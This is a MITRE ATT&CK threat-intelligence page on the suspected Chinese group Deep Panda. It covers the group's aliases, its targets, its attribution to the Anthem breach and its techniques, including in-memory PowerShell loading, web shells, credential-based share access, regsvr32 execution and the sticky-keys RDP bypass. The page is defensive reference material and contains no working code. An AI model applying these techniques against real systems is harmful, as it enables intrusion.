Group: Deep Panda, Shell Crew, ...

From ATT&CK
Jump to: navigation, search
Deep Panda, Shell Crew, ...
Group
ID G0009
Aliases Deep Panda, Shell Crew, WebMasters, KungFu Kittens, PinkPanther, Black Vine

Deep Panda is a suspected Chinese threat group known to target many industries, including government, defense, financial, and telecommunications.1 The intrusion into healthcare company Anthem has been attributed to Deep Panda.2 This group is also known as Shell Crew, WebMasters, KungFu Kittens, and PinkPanther.3 Deep Panda also appears to be known as Black Vine based on the attribution of both group names to the Anthem intrusion.4

Techniques Used

  • PowerShell - Deep Panda has used PowerShell scripts to download and execute programs in memory, without writing to disk.1
  • Web Shell - Deep Panda uses Web shells on publicly accessible Web servers to access victim networks.5
  • Windows Admin Shares - Deep Panda uses net.exe to connect to network shares using "net use" commands with compromised credentials.1
  • Scripting - Deep Panda has used PowerShell scripts to download and execute programs in memory, without writing to disk.1
  • Regsvr32 - Deep Panda has used regsvr32 to execute a server variant of Derusbi in victim networks.3
  • Accessibility Features - Deep Panda has used the sticky-keys technique to bypass the RDP login screen on remote systems during intrusions.3

Software